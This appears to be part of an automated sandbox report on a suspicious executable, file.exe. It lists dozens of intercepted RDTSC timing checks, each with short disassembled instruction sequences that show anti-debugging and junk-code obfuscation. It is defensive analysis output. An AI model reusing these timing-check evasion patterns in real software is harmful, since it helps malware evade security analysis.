                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC5B7F second address: EC5B89 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FBBA8502AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC5B89 second address: EC5BA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007FBBA93ED296h 0x00000009 jmp 00007FBBA93ED29Dh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC5BA1 second address: EC5BA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC5CDC second address: EC5CF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBBA93ED2A4h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC5CF9 second address: EC5CFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC5CFF second address: EC5D03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC5D03 second address: EC5D32 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBA8502AC1h 0x00000007 jmp 00007FBBA8502ABAh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jng 00007FBBA8502AB8h 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC5D32 second address: EC5D43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jns 00007FBBA93ED296h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC5D43 second address: EC5D4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC602A second address: EC603E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBBA93ED29Fh 0x00000009 popad 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECB8D3 second address: ECB8D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECB8D8 second address: ECB8FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007FBBA93ED2A6h 0x0000000a jmp 00007FBBA93ED29Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECBA50 second address: ECBA5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FBBA8502AB6h 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECBA5E second address: ECBA7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FBBA93ED2A8h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECC326 second address: ECC33D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBBA8502AC3h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECC33D second address: ECC343 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECC343 second address: ECC35F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jl 00007FBBA8502AB6h 0x0000000d push edi 0x0000000e pop edi 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jnc 00007FBBA8502AB8h 0x0000001a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECC35F second address: ECC364 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECDCAD second address: ECDCB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECDCB3 second address: ECDCC9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jbe 00007FBBA93ED296h 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED366B second address: ED366F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED366F second address: ED3673 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED3673 second address: ED367F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FBBA8502AB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED367F second address: ED3687 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED3687 second address: ED368B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED368B second address: ED36B1 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBBA93ED296h 0x00000008 jmp 00007FBBA93ED29Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jnp 00007FBBA93ED296h 0x00000017 ja 00007FBBA93ED296h 0x0000001d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED22C8 second address: ED22CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED273A second address: ED273E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED2E93 second address: ED2E98 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7BEBB second address: E7BED9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jl 00007FBBA93ED296h 0x0000000d jno 00007FBBA93ED296h 0x00000013 pop eax 0x00000014 popad 0x00000015 jc 00007FBBA93ED2A0h 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED1E89 second address: ED1E93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FBBA8502AB6h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED66D2 second address: ED66D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED66D8 second address: ED66DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDF02A second address: EDF02F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDDF8E second address: EDDFA9 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FBBA8502AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FBBA8502AC1h 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9C254 second address: E9C25A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9C3B0 second address: E9C3BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007FBBA8502AB6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9C3BB second address: E9C420 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007FBBA93ED2A7h 0x0000000d xchg eax, esi 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007FBBA93ED298h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 00000019h 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 jmp 00007FBBA93ED2A0h 0x0000002d nop 0x0000002e push edi 0x0000002f pushad 0x00000030 pushad 0x00000031 popad 0x00000032 pushad 0x00000033 popad 0x00000034 popad 0x00000035 pop edi 0x00000036 push eax 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b jc 00007FBBA93ED296h 0x00000041 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9C420 second address: E9C424 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9C424 second address: E9C42A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9C4C8 second address: E9C4EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBA8502AC5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push edx 0x0000000e jl 00007FBBA8502ABCh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9CAC0 second address: E9CB18 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007FBBA93ED298h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 0000001Ch 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 mov di, si 0x00000029 mov dh, 9Fh 0x0000002b push 0000001Eh 0x0000002d jmp 00007FBBA93ED2A7h 0x00000032 nop 0x00000033 pushad 0x00000034 jp 00007FBBA93ED29Ch 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9CB18 second address: E9CB24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jnc 00007FBBA8502AB6h 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9CC7F second address: E9CC94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007FBBA93ED298h 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9CE6D second address: E9CE98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007FBBA8502ABFh 0x0000000f jmp 00007FBBA8502ABDh 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9CE98 second address: E9CE9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9CFF5 second address: E9CFFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FBBA8502AB6h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9CFFF second address: E7BEBB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b movzx edx, bx 0x0000000e mov dword ptr [ebp+122D1A79h], esi 0x00000014 lea eax, dword ptr [ebp+1247FA56h] 0x0000001a push 00000000h 0x0000001c push ecx 0x0000001d call 00007FBBA93ED298h 0x00000022 pop ecx 0x00000023 mov dword ptr [esp+04h], ecx 0x00000027 add dword ptr [esp+04h], 00000017h 0x0000002f inc ecx 0x00000030 push ecx 0x00000031 ret 0x00000032 pop ecx 0x00000033 ret 0x00000034 mov dword ptr [ebp+122D2FE4h], eax 0x0000003a jnp 00007FBBA93ED299h 0x00000040 mov di, dx 0x00000043 push eax 0x00000044 jmp 00007FBBA93ED29Bh 0x00000049 mov dword ptr [esp], eax 0x0000004c push 00000000h 0x0000004e push ecx 0x0000004f call 00007FBBA93ED298h 0x00000054 pop ecx 0x00000055 mov dword ptr [esp+04h], ecx 0x00000059 add dword ptr [esp+04h], 0000001Ch 0x00000061 inc ecx 0x00000062 push ecx 0x00000063 ret 0x00000064 pop ecx 0x00000065 ret 0x00000066 mov edx, 0198D52Dh 0x0000006b jnp 00007FBBA93ED299h 0x00000071 movsx edx, si 0x00000074 mov edx, 4498BF36h 0x00000079 call dword ptr [ebp+12449B9Bh] 0x0000007f pushad 0x00000080 jmp 00007FBBA93ED2A9h 0x00000085 push eax 0x00000086 push edx 0x00000087 ja 00007FBBA93ED296h 0x0000008d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDE25C second address: EDE264 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDE264 second address: EDE26A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDE66F second address: EDE673 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDE673 second address: EDE6A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FBBA93ED29Dh 0x0000000d push esi 0x0000000e push esi 0x0000000f pop esi 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FBBA93ED2A8h 0x00000018 push eax 0x00000019 pop eax 0x0000001a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDEAB6 second address: EDEABE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDEC4D second address: EDEC51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE19B3 second address: EE19BA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE1B0D second address: EE1B11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE1B11 second address: EE1B19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE454E second address: EE4565 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBBA93ED2A3h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE4565 second address: EE45A3 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FBBA8502AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jne 00007FBBA8502AB6h 0x00000011 jg 00007FBBA8502AB6h 0x00000017 jmp 00007FBBA8502ABEh 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f pop edx 0x00000020 pop eax 0x00000021 pushad 0x00000022 jne 00007FBBA8502ABCh 0x00000028 pushad 0x00000029 pushad 0x0000002a popad 0x0000002b pushad 0x0000002c popad 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE9159 second address: EE9182 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FBBA93ED296h 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007FBBA93ED296h 0x00000012 jmp 00007FBBA93ED2A7h 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE9182 second address: EE91A2 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FBBA8502AB6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d jbe 00007FBBA8502ACAh 0x00000013 push edi 0x00000014 pushad 0x00000015 popad 0x00000016 jg 00007FBBA8502AB6h 0x0000001c pop edi 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE9705 second address: EE9722 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FBBA93ED2A6h 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEC44C second address: EEC450 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEC450 second address: EEC485 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007FBBA93ED2A0h 0x0000000e je 00007FBBA93ED296h 0x00000014 pop esi 0x00000015 pushad 0x00000016 jmp 00007FBBA93ED2A2h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF0EFE second address: EF0F19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push edx 0x00000008 pop edx 0x00000009 jg 00007FBBA8502AB6h 0x0000000f pop esi 0x00000010 popad 0x00000011 jc 00007FBBA8502AD9h 0x00000017 push eax 0x00000018 push edx 0x00000019 push esi 0x0000001a pop esi 0x0000001b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF0F19 second address: EF0F1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF1089 second address: EF108D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF1355 second address: EF135B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF14A4 second address: EF14B7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 jne 00007FBBA8502AD4h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF14B7 second address: EF14BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF14BB second address: EF14C7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF14C7 second address: EF14CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9C95A second address: E9C971 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FBBA8502AC0h 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF1630 second address: EF1643 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FBBA93ED296h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b js 00007FBBA93ED296h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF17C8 second address: EF17CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF17CC second address: EF17D8 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FBBA93ED296h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF8513 second address: EF8519 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF869A second address: EF869E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF869E second address: EF86A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF86A2 second address: EF86A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF8969 second address: EF8973 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FBBA8502AB6h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF8973 second address: EF897B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF897B second address: EF897F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF897F second address: EF89CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FBBA93ED296h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007FBBA93ED2A9h 0x00000014 jmp 00007FBBA93ED29Dh 0x00000019 pushad 0x0000001a push edx 0x0000001b pop edx 0x0000001c jmp 00007FBBA93ED2A2h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF91EC second address: EF91F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF91F5 second address: EF9205 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBBA93ED29Ch 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF9205 second address: EF9229 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FBBA8502AB6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d ja 00007FBBA8502AB6h 0x00000013 jmp 00007FBBA8502ABFh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF94E5 second address: EF9505 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBA93ED29Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a js 00007FBBA93ED296h 0x00000010 push edi 0x00000011 pop edi 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 push ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
